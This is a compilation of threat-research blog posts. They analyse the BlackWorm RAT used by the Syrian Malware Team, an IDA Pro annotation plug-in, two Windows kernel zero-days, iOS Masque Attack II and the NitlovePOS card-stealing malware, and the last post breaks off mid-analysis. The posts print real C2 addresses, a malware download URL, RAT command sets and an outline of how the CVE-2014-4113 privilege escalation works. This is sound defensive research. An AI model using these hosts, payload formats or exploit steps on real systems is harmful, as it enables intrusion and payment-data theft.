
Connecting the Dots: Syrian Malware Team Uses BlackWorm for Attacks

29 August 2014 at 08:00

The Syrian Electronic Army has made news for its recent attacks on major communications websites, Forbes, and an alleged attack on CENTCOM. While these attacks garnered public attention, the activities of another group - the Syrian Malware Team - have gone largely unnoticed. The group’s activities prompted us to take a closer look. We discovered this group using a .NET-based RAT called BlackWorm to infiltrate their targets.

The Syrian Malware Team is largely pro-Syrian government, as seen in one of their banners featuring Syrian President Bashar al-Assad. Based on the sentiments the group expresses publicly, it is likely either directly or indirectly involved with the Syrian government. Further, certain members of the Syrian Malware Team have ties to the Syrian Electronic Army (SEA), which is known to be linked to the Syrian government, suggesting that the Syrian Malware Team may be an offshoot of, or part of, the SEA.

syria1

Banner used by the Syrian Malware Team

BlackWorm Authorship

We found at least two distinct versions of the BlackWorm tool, including an original/private version (v0.3.0) and the Dark Edition (v2.1). The original BlackWorm builder was co-authored by Naser Al Mutairi from Kuwait, better known by his online moniker 'njq8'. He is also known to have coded njw0rm, njRAT/LV, and earlier versions of H-worm/Houdini. We found his code being used in a slew of other RATs such as Fallaga and Spygate. BlackWorm v0.3.0 was also co-authored by another actor, Black Mafia.

syria2

About section within the original version of BlackWorm builder

Within the underground development forums, it’s common for threat actors to collaborate on toolsets. Some write the base tools that other attackers can use; others modify and enhance existing tools.

The BlackWorm builder v2.1 is a prime example of actors modifying and enhancing current RATs. After njq8 and Black Mafia created the original builder, another author, Black.Hacker, enhanced its feature set.

syria3

About section within BlackWorm Dark Edition builder

syria4

Black.Hacker's banner on social media

syria5

As an interesting side note, 'njq8' took down his blog in recent months and announced on his Twitter and Facebook accounts that he was ceasing all malware development activity, urging others to stop as well. This is likely a direct result of the lawsuit filed against him by Microsoft.

BlackWorm RAT Features

The builder for BlackWorm v0.3.0 is fairly simple and allows for very quick payload generation, but doesn’t allow any configuration other than the IP address for command and control (C2).

syria6

Building binary through BlackWorm v0.3.0

syria7

BlackWorm v0.3.0 controller

BlackWorm v0.3.0 supports the following commands between the controller and the implant:

ping            Checks if the victim is online
closeserver     Exits the implant
restartserver   Restarts the implant
sendfile        Transfers and runs a file from the server
download        Downloads and runs a file from a URL
ddos            Ping floods a target
msgbox          Opens a message box to interact with the victim
down            Kills critical Windows processes
blocker         Blocks a specified website by pointing its resolution to 127.0.0.1
logoff          Logs out of Windows
restart         Restarts the system
shutdown        Shuts down the system
more            Disables Task Manager, registry tools and System Restore; also blocks keyboard and mouse input
hror            Displays a startling flash video

In addition to the features supported by the command structure, the payload can:

  • Seek and kill no-ip processes DUC30 and DUC20
  • Disable Task Manager to kill process dialog
  • Copy itself to USB drives and create autorun entries
  • Copy itself to common peer-to-peer (P2P) share locations
  • Collect system information such as OS, username, hostname, presence of camera, active window name, etc., to display in the controller
  • Kill the following analysis processes (if found):
    • procexp
    • SbieCtrl
    • SpyTheSpy
    • SpeedGear
    • Wireshark
    • MBAM
    • ApateDNS
    • IPBlocker
    • cPorts
    • ProcessHacker
    • AntiLogger

The Syrian Malware Team primarily uses another version of BlackWorm called the Dark Edition (v2.1). BlackWorm v2.1 was released on a prolific underground forum where information and code is often shared, traded and sold.

syria8

BlackWorm v2.1 has the same abilities as the original version and additional functionality, including bypassing UAC, disabling host firewalls and spreading over network shares. Unlike its predecessor, it also allows for granular control of the features available within the RAT. These additional controls allow the RAT user to enable and disable features as needed. Binary output can also be generated in multiple formats, such as .exe, .src and .dll.

syria9

BlackWorm Dark Edition builder

Syrian Malware Team

We observed activity from the Syrian Malware Team going as far back as Jan. 1, 2011. Based on Facebook posts, they are allegedly directly or indirectly involved with the Syrian government. Their Facebook page shows they are still very active, with a post as recent as July 16th, 2014.

syria10

Syrian Malware Team’s Facebook page

The Syrian Malware Team has been involved in everything from profiling targets to orchestrating attacks themselves. There are seemingly multiple members, including:

Partial list of self-proclaimed Syrian Malware Team members

Some of these people have posted malware-related items on Facebook.

syria11

Facebook posting of virus scanning of files

While looking for Dark Edition samples, we discovered a binary named svchost.exe (MD5: 015c51e11e314ff99b1487d92a1ba09b). We quickly saw indicators that it was created by BlackWorm Dark Edition.

syria12

Configuration options within code

The malware communicated out to 178.44.115.196, over port 5050, with a command structure of:

!0/j|n\12121212_64F3BF1F/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win 7 Professional SP1 x86/j|n\No/j|n\2.4.0 [ Dark Edition]/j|n\/j|n\{ActiveWindowName}/j|n\[endof]

When looking at samples of Dark Edition BlackWorm being used by the Syrian Malware Team, the strings “Syrian Malware” or “Syrian Malware Team” are often used in the C2 communications or within the binary strings.
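The beacon format is straightforward to pull apart once the delimiter is known. The following minimal Python sketch (our illustration, not code from the malware or from any FireEye tool) splits a BlackWorm-style beacon on the "/j|n\" delimiter and strips the "[endof]" terminator; the sample string is synthetic.

    DELIM = "/j|n\\"          # literal delimiter seen in the traffic above
    TERMINATOR = "[endof]"

    def parse_beacon(raw):
        """Strip the trailing terminator and split the beacon into fields."""
        raw = raw.strip()
        if raw.endswith(TERMINATOR):
            raw = raw[: -len(TERMINATOR)]
        return raw.split(DELIM)

    # Synthetic example modeled on the structure shown above.
    sample = ("!0/j|n\\Syrian Malware/j|n\\HOSTNAME/j|n\\user/j|n\\USA"
              "/j|n\\Win 7 Professional SP1 x86/j|n\\No/j|n\\0.1/j|n\\/j|n\\Notepad/j|n\\[endof]")
    for index, field in enumerate(parse_beacon(sample)):
        print(index, repr(field))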

Additional pivoting off of svchost.exe led us to three more samples apparently built with BlackWorm Dark Edition. One binary that drew our attention, E.exe (MD5: a8cf815c3800202d448d035300985dc7), appeared to be a backdoor containing the Syrian Malware strings.

syria13

When executed, the binary beacons to aliallosh.sytes.net on port 1177. This C2 has been seen in multiple malware runs often associated with Syria.  The command structure of the binary is:

!0/j|n\Syrian Malware/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win 7 Professional SP1 x86/j|n\No/j|n\0.1/j|n\/j|n\{ActiveWindowName}/j|n\[endof]

Finally, pivoting to another sample, 1gpj.srcRania (MD5: f99c15c62a5d981ffac5fdb611e13095), the same strings were present. The string "Rania," used as a lure, was in Arabic and likely refers to the prominent Queen Rania of Jordan.

syria14

The traffic is nearly identical to the other samples we identified and tied to the Syrian Malware Team.

!1/j|n\C:\Documents and Settings\{Username}\Local Settings\Application DataldoDrZdpkK.jpg - Windows Internet Explorer[endof]!0/j|n\Syrian Malware/j|n\{Hostname}/j|n\{Username}/j|n\USA/j|n\Win XP ProfessionalSP2 x86/j|n\No/j|n\0.1/j|n\/j|n\C:\Documents and Settings\{Username}\Local Settings\Application DataldoDrZdpkK.jpg - {ActiveWindowName}/j|n\[endof]

Conclusion

Determining which groups use which malware is often very difficult. Connecting the dots between actors and malware typically involves looking at binary code, identifying related malware examples associated with those binaries, and reviewing infection vectors, among other things.

This blog presents a prime example of the process of attribution. We connected a builder with malware samples and the actors/developers behind these attacks. This type of attribution is key to creating actionable threat intelligence to help proactively protect organizations.

FLARE IDA Pro Script Series: MSDN Annotations Plugin for Malware Analysis

11 September 2014 at 22:00

The FireEye Labs Advanced Reverse Engineering (FLARE) Team continues to share knowledge and tools with the community. We started this blog series with a script for Automatic Recovery of Constructed Strings in Malware. As always, you can download these scripts at the following location: https://github.com/fireeye/flare-ida. We hope you find all these scripts as useful as we do.

 

Motivation

 

During my summer internship with the FLARE team, my goal was to develop IDAPython plug-ins that speed up the reverse engineering workflow in IDA Pro. While analyzing malware samples with the team, I realized that a lot of time is spent looking up information about functions, arguments, and constants at the Microsoft Developer Network (MSDN) website. Frequently switching to the developer documentation can interrupt the reverse engineering process, so we thought about ways to integrate MSDN information into IDA Pro automatically. In this blog post we will release a script that does just that, and we will show you how to use it.

 

Introduction

 

The MSDN Annotations plug-in integrates information about functions, arguments and return values into IDA Pro’s disassembly listing in the form of IDA comments. This allows the information to be integrated as seamlessly as possible. Additionally, the plug-in is able to automatically rename constants, which further speeds up the analyst workflow. The plug-in relies on an offline XML database file, which is generated from Microsoft’s documentation and IDA type library files.

 

Features

 

Table 1 shows the benefit the plug-in provides to an analyst. On the left you can see IDA Pro’s standard disassembly: seven arguments get pushed onto the stack and then the CreateFileA function is called. Normally an analyst would have to look up function, argument and possibly constant descriptions in the documentation to understand what this code snippet is trying to accomplish. To obtain readable constant values, an analyst would be required to research the respective argument, import the corresponding standard enumeration into IDA and then manually rename each value. The right side of Table 1 shows the result of executing our plug-in and illustrates the support it offers to an analyst.

The most obvious change is that constants are renamed automatically. In this example, 40000000h was automatically converted to GENERIC_WRITE. Additionally, each function argument is renamed to a unique name, so the corresponding description can be added to the disassembly.

flare1

Table 1: Automatic labelling of standard symbolic constants

In Figure 1 you can see how the plug-in enables you to display function, argument, and constant information right within the disassembly. The top image shows how hovering over the CreateFileA function displays a short description and the return value. In the middle image, hovering over the hTemplateFile argument displays the corresponding description. And in the bottom image, you can see how hovering over dwShareMode, the automatically renamed constant, displays descriptive information.

Functions

flare2

Arguments

flare3

Constants

flare4

Figure 1: Hovering over function names, arguments and constants displays the respective descriptions

 

How it works

 

Before the plug-in makes any changes to the disassembly, it creates a backup of the current IDA database file (IDB). This file gets stored in the same directory as the current database and can be used to revert to the previous markup in case you do not like the changes or something goes wrong.

The plug-in is designed to run once on a sample before you start your analysis. It relies on an offline database generated from the MSDN documentation and IDA Pro type library (TIL) files. For every function reference in the import table, the plug-in annotates the function’s description and return value, adds argument descriptions, and renames constants. An example of an annotated import table is depicted in Figure 2. It shows how a descriptive comment is added to each API function call. In order to identify addresses of instructions that position arguments prior to a function call, the plug-in relies on IDA Pro’s markup.

flare5

Figure 2: Annotated import table
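As a rough illustration of this kind of import-table annotation (not the plug-in's actual implementation, and written against the current IDAPython API rather than the IDA 6.x API the plug-in targeted), the sketch below walks the import table and attaches a repeatable comment to each function it has data for; the DESCRIPTIONS dictionary is a hypothetical stand-in for the offline MSDN database.

    import ida_nalt
    import idc

    # Hypothetical stand-in for the offline MSDN database.
    DESCRIPTIONS = {
        "CreateFileA": "Creates or opens a file or I/O device.",
    }

    def annotate(ea, name, ordinal):
        """Callback for enum_import_names: comment imports we have data for."""
        if name in DESCRIPTIONS:
            idc.set_cmt(ea, DESCRIPTIONS[name], 1)   # 1 = repeatable comment
        return True                                  # keep enumerating

    for module_index in range(ida_nalt.get_import_module_qty()):
        ida_nalt.enum_import_names(module_index, annotate)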

Figure 3 shows the additional .msdn segment the plug-in creates in order to store argument descriptions. This only impacts the IDA database file and does not modify the original binary.

flare6

Figure 3: The additional segment added to the IDA database

The .msdn segment stores the argument descriptions as shown in Figure 4. The unique argument names and their descriptive comments are sequentially added to the segment.

flare7

Figure 4: Names and comments inserted for argument descriptions

To allow the user to see constant descriptions by hovering over constants in the disassembly, the plug-in imports IDA Pro’s relevant standard enumeration and adds descriptive comments to the enumeration members. Figure 5 shows this for the MACRO_CREATE enumeration, which stores constants passed as dwCreationDisposition to CreateFileA.

flare8

Figure 5: Descriptions added to the constant enumeration members

 

Preparing the MSDN database file

 

The plug-in’s graphical interface requires you to have the Qt framework and Python scripting installed. This is included with the IDA Pro 6.6 release. You can also set it up for IDA 6.5 as described here (http://www.hexblog.com/?p=333).

As mentioned earlier, the plug-in requires an XML database file storing the MSDN documentation. We cannot distribute the database file with the plug-in because Microsoft holds the copyright for it. However, we provide a script to generate the database file. It can be cloned from the git repository at https://github.com/fireeye/flare-ida together with the annotation plug-in.

You can take the following steps to set up the database file. You only have to do this once.

 

     

  1. Download and install an offline version of the MSDN documentation. You can download the Microsoft Windows SDK MSDN documentation; the standalone installer is available from http://www.microsoft.com/en-us/download/details.aspx?id=18950. Although it is not the newest SDK version, it includes all the needed information and data extraction is straightforward. As shown in Figure 6, you can select to only install the help files. By default they are located in C:\Program Files\Microsoft SDKs\Windows\v7.0\Help\1033.

     

    flare9

    Figure 6: Installing a local copy of the MSDN documentation

     

  2. Extract the files with an archive manager like 7-zip to a directory of your choice.
  3. Download and extract tilib.exe from Hex-Rays’ download page at https://www.hex-rays.com/products/ida/support/download.shtml

     

    To allow the plug-in to rename constants, it needs to know which enumerations to import. IDA Pro stores this information in TIL files located in %IDADIR%/til/. Hex-Rays provides a tool (tilib) to show TIL file contents via their download page for registered users. Download the tilib archive and extract the binary into %IDADIR%. If you run tilib without any arguments and it displays its help message, the program is running correctly.

  4. Run MSDN_crawler/msdn_crawler.py <path to extracted MSDN documentation> <path to tilib.exe> <path to til files>

     

     

    With these prerequisites fulfilled, you can run the MSDN_crawler.py script, located in the MSDN_crawler directory. It expects the path to the TIL files you want to extract (normally %IDADIR%/til/pc/) and the path to the extracted MSDN documentation. After the script finishes execution the final XML database file should be located in the MSDN_data directory.


 

You can now run our plug-in to annotate your disassembly in IDA.

Running the MSDN annotations plug-in

In IDA, use File - Script file... (ALT + F7) to open the script named annotate_IDB_MSDN.py. This will display the dialog box shown in Figure 7 that allows you to configure the modifications the plug-in performs. By default, the plug-in annotates functions, arguments and renames constants. If you change the settings and execute the plug-in by clicking OK, your settings get stored in a configuration file in the plug-in’s directory. This allows you to quickly run the plug-in on other samples using your preferred settings. If you do not choose to annotate functions and/or arguments, you will not be able to see the respective descriptions by hovering over the element.

flare10

Figure 7: The plug-in’s configuration window showing the default settings

When you choose to use repeatable comments for function name annotations, the description is visible in the disassembly listing, as shown in Figure 8.

flare11

Figure 8: The plug-in’s preview of function annotations with repeatable comments

 

Similar Tools and Known Limitations

 

Parts of our solution were inspired by existing IDA Pro plug-ins, such as IDAScope and IDAAPIHelp. A special thank you goes out to Zynamics for their MSDN crawler and the IDA importer which greatly supported our development.

Our plug-in has mainly been tested on IDA Pro for Windows, though it should work on all platforms. Due to the structure of the MSDN documentation and limitations of the MSDN crawler, not all constants can be parsed automatically. When you encounter missing information you can extend the annotation database by placing files with supplemental information into the MSDN_data directory. In order to be processed correctly, they have to be valid XML following the schema given in the main database file (msdn_data.xml). However, if you want to extend partly existing function information, you only have to add the additional fields. Name tags are mandatory for this, as they get used to identify the respective element.

For example, if the parser did not recognize a commonly used constant, we could add the information manually. For the CreateFileA function’s dwDesiredAccess argument the additional information could look similar to Listing 1.

<?xml version="1.0" encoding="ISO-8859-1"?>
<msdn>
  <functions>
    <function>
      <name>CreateFileA</name>
      <arguments>
        <argument>
          <name>dwDesiredAccess</name>
          <constants enums="MACRO_GENERIC">
            <constant>
              <name>GENERIC_ALL</name>
              <value>0x10000000</value>
              <description>All possible access rights</description>
            </constant>
            <constant>
              <name>GENERIC_EXECUTE</name>
              <value>0x20000000</value>
              <description>Execute access</description>
            </constant>
            <constant>
              <name>GENERIC_WRITE</name>
              <value>0x40000000</value>
              <description>Write access</description>
            </constant>
            <constant>
              <name>GENERIC_READ</name>
              <value>0x80000000</value>
              <description>Read access</description>
            </constant>
          </constants>
        </argument>
      </arguments>
    </function>
  </functions>
</msdn>

 

 

Listing 1: Additional information enhancing the dwDesiredAccess argument for the CreateFileA function
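To illustrate how such a supplemental file can be consumed (this is a standalone sketch, not the plug-in's own parser; "supplement.xml" is a placeholder filename), the following Python reads an XML file shaped like Listing 1 and builds a value-to-name map for one argument.

    import xml.etree.ElementTree as ET

    def load_constants(xml_path, function_name, argument_name):
        """Return {value: (name, description)} for one function argument."""
        result = {}
        root = ET.parse(xml_path).getroot()
        for func in root.iter("function"):
            if func.findtext("name") != function_name:
                continue
            for arg in func.iter("argument"):
                if arg.findtext("name") != argument_name:
                    continue
                for const in arg.iter("constant"):
                    value = int(const.findtext("value"), 16)
                    result[value] = (const.findtext("name"),
                                     const.findtext("description"))
        return result

    consts = load_constants("supplement.xml", "CreateFileA", "dwDesiredAccess")
    print(consts.get(0x40000000))   # ('GENERIC_WRITE', 'Write access')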

 

Conclusion

 

In this post, we showed how you can generate a MSDN database file used by our plug-in to automatically annotate information about functions, arguments and constants into IDA Pro’s disassembly. Furthermore, we talked about how the plug-in works, and how you can configure and customize it. We hope this speeds up your analysis process!

Stay tuned for the FLARE Team’s next post where we will release solutions for the FLARE On Challenge (www.flare-on.com).

 

Two Limited, Targeted Attacks; Two New Zero-Days

14 October 2014 at 14:46

The FireEye Labs team has identified two new zero-day vulnerabilities as part of limited, targeted attacks against some major corporations. Both zero-days exploit the Windows Kernel; Microsoft assigned CVE-2014-4148 and CVE-2014-4113 to the vulnerabilities and addressed them in its October 2014 Security Bulletin.

FireEye Labs has identified 16 zero-day attacks in the last two years – uncovering 11 in 2013 and five in 2014 so far.

Microsoft commented: “On October 14, 2014, Microsoft released MS14-058 to fully address these vulnerabilities and help protect customers. We appreciate FireEye Labs using Coordinated Vulnerability Disclosure to assist us in working toward a fix in a collaborative manner that helps keep customers safe.”

In the case of CVE-2014-4148, the attackers exploited a vulnerability in the Microsoft Windows TrueType Font (TTF) processing subsystem, using a Microsoft Office document to embed and deliver a malicious TTF to an international organization. Since the embedded TTF is processed in kernel-mode, successful exploitation granted the attackers kernel-mode access. Though the TTF is delivered in a Microsoft Office document, the vulnerability does not reside within Microsoft Office.

CVE-2014-4148 impacted both 32-bit and 64-bit Windows operating systems shown in MS14-058, though the attacks only targeted 32-bit systems. The malware contained within the exploit has specific functions adapted to the following operating system platform categories:

  • Windows 8.1/Windows Server 2012 R2
  • Windows 8/Windows Server 2012
  • Windows 7/Windows Server 2008 R2 (Service Pack 0 and 1)
  • Windows XP Service Pack 3

CVE-2014-4113 rendered Microsoft Windows 7, Vista, XP, Windows 2000, Windows Server 2003/R2, and Windows Server 2008/R2 vulnerable to a local Elevation of Privilege (EoP) attack. This means that the vulnerability cannot be used on its own to compromise a customer’s security. An attacker would first need to gain access to a remote system running any of the above operating systems before they could execute code within the context of the Windows Kernel. Investigation by FireEye Labs has revealed evidence that attackers have likely used variations of these exploits for a while. Windows 8 and Windows Server 2012 and later do not have these same vulnerabilities.

Information on the companies affected, as well as threat actors, is not available at this time. We have no evidence of these exploits being used by the same actors. Instead, we have only observed each exploit being used separately, in unrelated attacks.

 

About CVE-2014-4148

 

 

Mitigation

 

Microsoft has released security update MS14-058 that addresses CVE-2014-4148.

Since TTF exploits target the underlying operating system, the vulnerability can be exploited through multiple attack vectors, including web pages. In the past, exploit kit authors have converted a similar exploit (CVE-2011-3402) for use in browser-based attacks. More information about this scenario is available under Microsoft’s response to CVE-2011-3402: MS11-087.

 

Details

 

This TTF exploit is packaged within a Microsoft Office file. Upon opening the file, the font will exploit a vulnerability in the Windows TTF subsystem located within the win32k.sys kernel-mode driver.

The attacker’s shellcode resides within the Font Program (fpgm) section of the TTF. The font program begins with a short sequence of instructions that quickly return. The remainder of the font program section is treated as unreachable code for the purposes of the font program and is ignored when initially parsing the font.
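When triaging a suspect document, the embedded font program can be inspected directly. The sketch below shows one way to do that with the open source fontTools library (our own example, not part of the exploit or of FireEye tooling; "sample.ttf" is a placeholder for an extracted font).

    from fontTools.ttLib import TTFont

    font = TTFont("sample.ttf")
    if "fpgm" in font:
        program = font["fpgm"].program
        # A short legitimate prologue followed by a large blob of "unreachable"
        # bytecode is the pattern described above.
        print("fpgm bytecode length:", len(program.getBytecode()))
        for line in program.getAssembly()[:10]:    # first few instructions only
            print(line)
    else:
        print("no font program (fpgm) table present")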

During exploitation, the attacker’s shellcode uses Asynchronous Procedure Calls (APC) to inject the second stage from kernel-mode into the user-mode process winlogon.exe (in XP) or lsass.exe (in other OSes). From the injected process, the attacker writes and executes a third stage (executable).

The third stage decodes an embedded DLL to, and runs it from, memory. This DLL is a full-featured remote access tool that connects back to the attacker.

Plenty of evidence supports the attacker’s high level of sophistication. Beyond the fact that the attack is a zero-day kernel-level exploit, the attack also showed the following:

  • a usable hard-coded area of kernel memory is used like a mutex to avoid running the shellcode multiple times
  • the exploit has an expiration date: if the current time is after October 31, 2014, the exploit shellcode will exit silently
  • the shellcode has implementation customizations for four different types of OS platforms/service pack levels, suggesting that testing for multiple OS platforms was conducted
  • the dropped malware individually decodes each string when that string is used to prevent analysis
  • the dropped malware is specifically customized for the targeted environment
  • the dropped remote access capability is full-featured and customized: it does not rely on generally available implementations (like Poison Ivy)
  • the dropped remote access capability is a loader that decrypts the actual DLL remote access capability into memory and never writes the decrypted remote access capability to disk

 

About CVE-2014-4113

 

 

Mitigation

 

Microsoft has released security update MS14-058 that addresses this vulnerability.

 

Vulnerability and Exploit Details

 

The 32-bit exploit triggers an out-of-bounds memory access that dereferences offsets from a high memory address, and inadvertently wraps into the null page. In user-mode, memory dereferences within the null page are generally assumed to be non-exploitable. Since the null page is usually not mapped (the exception being 16-bit legacy applications emulated by ntvdm.exe), null pointer dereferences will simply crash the running process. In contrast, memory dereferences within the null page in the kernel are commonly exploited because the attacker can first map the null page from user-mode, as is the case with this exploit. The steps taken for successful 32-bit exploitation are:

 

     

  1. Map the null page:
       1. ntdll!ZwAllocateVirtualMemory(…, BaseAddress=0x1, …)
  2. Build a malformed win32k!tagWND structure at the null page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode
       1. Callback overwrites EPROCESS.Token to elevate privileges
  5. Spawns a child process that inherits the elevated access token

 

32-bit Windows 8 and later users are not affected by this exploit. The Windows 8 Null Page protection prohibits user-mode processes from mapping the null page and causes the exploits to fail.

In the 64-bit version of the exploit, dereferencing offsets from a high 32-bit memory address does not wrap, as the result is well within the addressable memory range for a 64-bit user-mode process. As such, the Null Page protection implemented in Windows versions 7 (after MS13-031) and later does not apply. The steps taken by the 64-bit exploit variants are:

 

     

  1. Map memory page:
       1. ntdll!ZwAllocateVirtualMemory(…)
  2. Build a malformed win32k!tagWND structure at the mapped page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode
       1. Callback overwrites EPROCESS.Token to elevate privileges
  5. Spawns a child process that inherits the elevated access token

 

64-bit Windows 8 and later users are not affected by this exploit. Supervisor Mode Execution Prevention (SMEP) blocks the attacker’s user-mode callback from executing within kernel-mode and causes the exploits to fail.

 

Exploits Tool History

 

The exploits are implemented as a command line tool that accepts a single command line argument – a shell command to execute with SYSTEM privileges. This tool appears to be an updated version of an earlier tool. The earlier tool exploited CVE-2011-1249, and displays the following usage message to stdout when run:

 

Usage:system_exp.exe cmd

 

 

Windows Kernel Local Privilege Exploits

 

The vast majority of samples of the earlier tool have compile dates in December 2009.  Only two samples were discovered with compile dates in March 2011. Although the two samples exploit the same CVE, they carry a slightly modified usage message of:

 

Usage:local.exe cmd

 

 

Windows local Exploits

 

The most recent version of the tool, which implements CVE-2014-4113, eliminates all usage messages.

The tool appears to have gone through at least three iterations over time. The initial tool and exploit are believed to have had limited availability, and may have been employed by a handful of distinct attack groups. As the exploited vulnerability was remediated, someone with access to the tool modified it to use a newer exploit when one became available. These two newer versions likely did not achieve the widespread distribution that the original tool/exploit did and may have been retained privately, not necessarily even by the same actors.

We would like to thank Barry Vengerik, Joshua Homan, Steve Davis, Ned Moran, Corbin Souffrant, and Xiaobo Chen for their assistance on this research.

iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking

By: Hui Xue
19 February 2015 at 19:00

In November of last year, we uncovered a major flaw in iOS we dubbed “Masque Attack” that allowed malicious apps to replace existing, legitimate ones on an iOS device via SMS, email, or web browsing. In total, we have notified Apple of five security issues related to four kinds of Masque Attacks. Today, we are sharing Masque Attack II in the series – part of which has been fixed in the recent iOS 8.1.3 security content update [2].

Masque Attack II includes bypassing iOS prompt for trust and iOS URL scheme hijacking. iOS 8.1.3 fixed the first part whereas the iOS URL scheme hijacking is still present.

iOS app URL scheme “lets you communicate with other apps through a protocol that you define.” [1] By deliberately defining the same URL schemes used by other apps, a malicious app can still hijack the communications towards those apps and mount phishing attacks to steal login credentials. Even worse than the first Masque Attack [3], attackers might be able to conduct Masque Attack II through an app in the App Store. We describe these two parts of Masque Attack II in the following sections.

Bypassing Prompt for Trust

When the user clicks to open an enterprise-signed app for the first time, iOS asks whether the user trusts the signing party. The app won’t launch unless the user chooses “Trust”. Apple suggested defending against Masque Attack with the aid of this “Don’t Trust” prompt [8]. We notified Apple that this was inadequate.

We find that when calling an iOS URL scheme, iOS launches the enterprise-signed app registered to handle the URL scheme without prompting for trust. It doesn’t matter whether the user has launched that enterprise-signed app before. Even if the user has always clicked “Don’t Trust”, iOS still launches that enterprise-signed app directly upon calling its URL scheme. In other words, when the user clicks on a link in SMS, iOS Mail or Google Inbox, iOS launches the target enterprise-signed app without asking for the user’s “Trust”, or even ignores the user’s previous “Don’t Trust” choice. An attacker can leverage this issue to launch an app containing a Masque Attack.

By crafting and distributing an enterprise-signed malware that registers app URL schemes identical to the ones used by legitimate popular apps, an attacker may hijack legitimate apps’ URL schemes and mimic their UI to carry out phishing attacks, e.g. stealing the login credentials. iOS doesn’t protect users from this attack because it doesn’t prompt for trust to the user when launching such an enterprise-signed malware for the first time through app URL scheme. In Demo Video 1, we explain this issue with concrete examples.
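For developers or reviewers who want to see which URL schemes an app claims, the schemes are declared in the app's Info.plist under CFBundleURLTypes. A minimal Python sketch (ours, with a placeholder path) that lists them:

    import plistlib

    def url_schemes(info_plist_path):
        """Return every URL scheme declared in an app's Info.plist."""
        with open(info_plist_path, "rb") as fh:
            info = plistlib.load(fh)
        schemes = []
        for entry in info.get("CFBundleURLTypes", []):
            schemes.extend(entry.get("CFBundleURLSchemes", []))
        return schemes

    # Comparing these lists across apps reveals duplicate registrations.
    print(url_schemes("Info.plist"))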

We’ve also found other approaches to bypass “Don’t Trust” protection through the iOS springboard. We confirmed these problems on iOS 7.1.2, 8.1.1, 8.1.2 and 8.2 beta. Recently Apple fixed these issues and acknowledged our findings in CVE-2014-4494 in the iOS 8.1.3 security content [2]. As measured by the App Store on 2 Feb 2015 [4], however, 28% of devices use iOS version 7 or lower, which are still vulnerable. Of the 72% on iOS 8, some are also vulnerable given that iOS 8.1.3 came out in late January 2015. We encourage users to upgrade their iOS devices to the latest version as soon as possible.

NitlovePOS: Another New POS Malware

23 May 2015 at 18:05

There has been a proliferation of malware specifically designed to extract payment card information from Point-of-Sale (POS) systems over the last two years. In 2015, a variety of new POS malware has already been identified, including a new Alina variant, FighterPOS and Punkey. During our research into a widespread spam campaign, we discovered yet another POS malware that we’ve named NitlovePOS.

The NitlovePOS malware can capture and exfiltrate track one and track two payment card data by scanning the running processes of a compromised machine. It then sends this data to a webserver using SSL.

We believe the cybercriminals assess the hosts compromised via indiscriminate spam campaigns and instruct specific victims to download the POS malware.

Propagation

We have been monitoring an indiscriminate spam campaign that started on Wednesday, May 20, 2015.  The spam emails referred to possible employment opportunities and purported to have a resume attached. The “From” email addresses were spoofed Yahoo! Mail accounts and contained the following “Subject” lines:

    Subject: Any Jobs?

    Subject: Any openings?

    Subject: Internship

    Subject: Internship questions

    Subject: Internships?

    Subject: Job Posting

    Subject: Job questions

    Subject: My Resume

    Subject: Openings?

The email came with an attachment named CV_[4 numbers].doc or My_Resume_[4 numbers].doc, which is embedded with a malicious macro. To trick the recipient into enabling the malicious macro, the document claims to be a “protected document.”
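For analysts who receive such a document, the macro source can be reviewed safely before anything runs. A small sketch using the open source oletools package (the filename is a placeholder):

    from oletools.olevba import VBA_Parser

    parser = VBA_Parser("My_Resume_1234.doc")
    if parser.detect_vba_macros():
        # Dump each macro stream so embedded URLs and shell commands can be reviewed.
        for _, stream_path, vba_filename, vba_code in parser.extract_macros():
            print("---", stream_path, vba_filename)
            print(vba_code)
    parser.close()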

If enabled, the malicious macro will download and execute a malicious executable from 80.242.123.155/exe/dro.exe. The cybercriminals behind this operation have been updating the payload. So far, we have observed:

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

These payloads beacon to the same server from which they are downloaded and receive instructions to download additional malware hosted on this server. This server contains a wide variety of malware:

    6545d2528460884b24bf6d53b721bf9e  5dro.exe

    e339fce54e2ff6e9bd3a5c9fe6a214ea  AndroSpread.exe

    9e208e9d516f27fd95e8d165bd7911e8  AndroSpread.exe

    abc69e0d444536e41016754cfee3ff90  dr2o.exe

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

    c8b0769eb21bb103b8fbda8ddaea2806  jews2.exe

    4d877072fd81b5b18c2c585f5a58a56e  load33.exe

    9c6398de0101e6b3811cf35de6fc7b79  load.exe

    ac8358ce51bbc7f7515e656316e23f8d  Pony.exe

    3309274e139157762b5708998d00cee0  Pony.exe

    b3962f61a4819593233aa5893421c4d1  pos.exe

    6cdd93dcb1c54a4e2b036d2e13b51216  pos.exe

We focused on the “pos.exe” malware and suspected that it might target Point of Sale machines. We speculate that once the attackers have identified a potentially interesting host from among their victims, they can then instruct the victim to download the POS malware. While we have observed many downloads of the various EXEs hosted on that server, we have only observed three downloads of “pos.exe”.

Technical Analysis

We analyzed the “pos.exe” (6cdd93dcb1c54a4e2b036d2e13b51216) binary found on the 80.242.123.155 server. (A new version of “pos.exe” (b3962f61a4819593233aa5893421c4d1) was uploaded on May 22, 2015 that has exactly the same malicious behavior but with different file structure.)

The binary itself is named “TAPIBrowser” and was created on May 20, 2015.

    File Name                       : pos.exe

    File Size                       : 141 kB

    MD5: 6cdd93dcb1c54a4e2b036d2e13b51216

    File Type                       : Win32 EXE

    Machine Type                    : Intel 386 or later, and compatibles

    Time Stamp                      : 2015:05:20 09:02:54-07:00

    PE Type                         : PE32

    File Description                : TAPIBrowser MFC Application

    File Version                    : 1, 0, 0, 1

    Internal Name                   : TAPIBrowser

    Legal Copyright                 : Copyright (C) 2000

    Legal Trademarks                :

    Original Filename               : TAPIBrowser.EXE

    Private Build                   :

    Product Name                    : TAPIBrowser Application

    Product Version                 : 1, 0, 0, 1:

The structure of the file is awkward; it only contains three sections: .rdata, .hidata and .rsrc, with the entry point located inside .hidata:

